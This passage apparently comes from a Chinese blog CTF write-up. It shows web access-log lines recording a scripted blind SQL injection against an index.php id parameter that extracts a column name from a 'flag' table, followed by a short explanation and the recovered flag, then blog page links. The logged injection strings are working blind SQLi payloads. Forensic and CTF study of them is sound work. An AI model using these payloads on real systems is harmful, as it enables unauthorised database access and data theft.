172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'P',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'O',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'N',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'M',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'L',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'K',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'J',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'I',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'H',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'G',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'A',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'@',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'?',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%3E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'=',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%3C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20';',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20':',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'9',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'8',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'7',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'6',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'5',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'4',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'3',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'2',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'1',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'0',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'/',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'.',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'-',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20',',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'+',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"

库名和表名table_name='flag'%20and%20table_schema='sqli',根据盲注原理能猜测每个位置注入的最后一个字符为该位置字符

columnflag

flag:sqli_flag_flag

-n0o0b-
关注
  • 12
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
山西省第二届网络安全技能大赛(企业组)部分赛题WP(一)
qq_32499435的博客
07-13 837
山西省第二届网络安全技能大赛(企业组)部分赛题WP(一)
2020全国网络与信息安全管理职业技能大赛初赛题库-《信息安全技术
12-16
2020全国网络与信息安全管理职业技能大赛初赛题库--《信息安全技术
第二届数据安全大赛暨首届“数信杯”数据安全大赛数据安全积分争夺赛-东区预赛部分WP
Aluxian_的博客
04-16 1846
(最终提交的结果为md5(不安全协议缩写小写+用户名+密码)。如不安全协议为http,用户名为abc,密码为123,则md5(http+abc+123,)提交48346e4b413ad63aac2d7e528f1da1e6)2.通过协议分析,基于不安全协议,可发现流量包中共计传输多少份文件,其中相对特殊的文件,其文件名是什么?如数量为 1,文件名(不包含后缀)为 flag,则提交结果为 md5(1+flag),提交:13fdbdc6aa7c5412c598e30f5bdbfdc3。
2023年江苏省职业院校技能大赛中职网络安全项目JSZ202335-网络安全赛项规程
明裕学长的博客
11-30 1422
赛前成立由巡视员、专家组长、裁判长、监督组长、仲裁组长、承办校领导等相关人员组成的应急处理小组,比赛期间发生任何意外事故(如赛卷、设备、安全等),发现者应第一时间报告专家组长,立即采取措施避免事态扩大,启动应急预案予以解决并报告大赛组委会。A集团的Linux服务器被黑客入侵,该服务器的系统目录被上传恶意软件,域用户凭证被读取,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。
第二届数据安全大赛暨首届“数信杯”数据安全大赛数据安全积分争夺赛-东区预赛wp
toto的博客
04-14 3031
附件下载地址:链接:https://pan.baidu.com/s/1tClZrup28n4fUe5Kpa7mgQ?pwd=kbd6。
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
http://www.lunatic007.top/
09-18 2400
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛WP
第二届数据安全大赛(数信杯)东部赛区数据分析部分WP
weixin_62467741的博客
04-15 1517
传输文件都是使用ftp,其中包括响应和请求,FTP协议中STOR代表上传文件,直接查STOR字符串一共多少个然后除以2(因为分请求和响应)就是101个,特殊文件名就是最后传输的文件key.txt。过滤流量,发现大部分为ftp和tcp协议,不太可能是tcp,直接找ftp,根据判断下一流是否成功响应别的页面内容得到用户名和密码。Flag值:a18b8e2d1a8ee267599b04be62f0a26a。Flag值:4825376109164835。
2022年湖北省第一届职业技能大赛世赛选拔赛网络安全竞赛规程
旺仔Sec&blog
11-04 774
通过竞赛,表彰一批优秀的年轻的技能人才,增强他们的自豪感、获得感,在全省上下营造“技能改变命运、匠心成就人生”的崇尚技能的氛围,激励广大青年走技能成才、技能报国之路。(3) 晋升职业技能等级。5.参赛队认为存在不符合竞赛规定的设备、工具、软件,有失公正的评判、奖励,以及工作人员的违规行为等情况时,须由领队向赛项仲裁组提交书面申诉材料。各参赛队对不符合大赛和赛项规程规定的仪器、设备、工装、材料、物件、计算机软硬件、竞赛使用工具、用品,竞赛执裁、赛场管理,以及工作人员的不规范行为等,可向赛项仲裁组提出申诉。
北京市第六届职业技能大赛——电子数据取证分析WP(B组)
weixin_41724843的博客
06-16 454
作为一个取证小白,本次比赛(考试)的题目还是有些难度的,时间两个小时,还有几道题没有做完。
复现】第十六届全国大学生信息安全竞赛 初赛 Writeup
m0_63563528的博客
06-21 1514
摘要:这是新手ctfer首次参加国赛所作的复现,如有错误烦请批评指正。
第五届浙江省大学生网络与信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2157
第五届浙江省大学生网络与信息安全竞赛-技能挑战赛 预赛 部分WP
(ITAT第七届全国信息技术应用水平大赛)电子商务运营预赛试要点.pdf
06-22
【ITAT第七届全国信息技术应用水平大赛】电子商务运营预赛试题主要涵盖了电子商务领域的多个知识点,包括电子商务网站的流量指标、电子商务模式识别、供应商评估标准、口碑推广的核心、网络营销形式、电子商务的本质...
2022第14届河北省机器人竞赛竞赛规则-wro初中组
12-11
【2022第14届河北省机器人竞赛竞赛规则-WRO初中组】是针对河北省青少年机器人竞赛的一项重要活动,旨在通过机器人竞技培养学生的创新、创造力和问题解决能力。该竞赛结合了科学、技术、工程、数学和计算机编程等多个...
第二届全国大学生数学竞赛预赛试卷(非数学类)
12-10
第二届全国大学生数学竞赛预赛试卷(非数学类),文档清晰,可打印
中央企业职业技能大赛财会职业技能竞赛初赛试题及答案.doc
09-25
【文档标题】提到的是“中央企业职业技能大赛财会职业技能竞赛初赛试题及答案”,这表明文档包含的内容主要是会计领域的知识,特别是与企业财务管理和税收相关的实际应用问题。这些问题涵盖增值税的计算、会计分录的...
web安全基础学习
m0_71332744的博客
07-31 360
记录学习的原理,少有实操持续更新
蓝屏事件:网络安全的启示
最新发布
m0_67187271的博客
08-04 703
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1687
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
【等保测评】网络安全服务认证技术规范(等级保护测评)
weixin_45840241的博客
08-02 575
5.1.3.4 报告编制阶段,应客观描述等级保护对象已采取的有效保护措施和存在的主要安全问题情况, 指出等级保护对象安全保护现状与相应等级的保护要求之间的差距,分析差距可能导致被测评系统面临的风险,给出等级保护测评结论,形成测评报告,测评报告应依据公安行政主管部门统一制订的网络安全等级保护测评报告模版的格式和内容要求编写,测评报告应通过评审并有相关记录。依据 GB/T 36959 提出的等级保护测评服务人员能力要求, 经授权的等级保护测评人员能力评估机构考核通过的专业测评技术人员。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值